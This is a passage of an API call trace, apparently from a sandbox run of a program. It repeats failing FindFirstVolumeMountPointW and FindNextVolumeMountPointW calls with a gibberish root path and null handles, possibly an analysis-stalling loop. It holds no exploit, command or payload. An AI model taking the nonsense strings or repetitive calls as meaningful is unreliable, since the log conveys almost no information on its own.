FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.573] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.573] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.574] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.574] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.574] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.574] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.574] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.574] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.574] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.574] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.574] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.574] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.574] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.574] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.574] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.574] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.574] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.574] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.574] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.574] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.574] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.574] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.574] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.575] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.575] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.575] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.575] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.575] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.575] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.575] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.575] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.575] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.575] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.575] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.575] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.575] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.575] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.575] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.575] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.576] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.576] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.576] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.576] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.576] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.576] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.576] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.576] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.576] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.576] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.576] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.576] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.576] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.576] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.576] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.576] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.577] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.577] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.578] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.578] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.578] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.578] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.578] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.578] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.578] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.578] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.578] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.578] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.578] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.578] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.578] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.578] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.578] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.578] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.578] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.578] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.578] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.578] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka zahaviwexepeniwa", lpszVolumeMountPoint=0x12f264, cchBufferLength=0x0 | out: lpszVolumeMountPoint="\xf2f0\x12\xf334\x12") returned 0xffffffff [0036.579] FindNextVolumeMountPointW (in: hFindVolumeMountPoint=0x0, lpszVolumeMountPoint=0x0, cchBufferLength=0x0 | out: lpszVolumeMountPoint=0x0) returned 0 [0036.579] FindFirstVolumeMountPointW (in: lpszRootPathName="De yazukesijavo bohisabiyoho xucojanuka 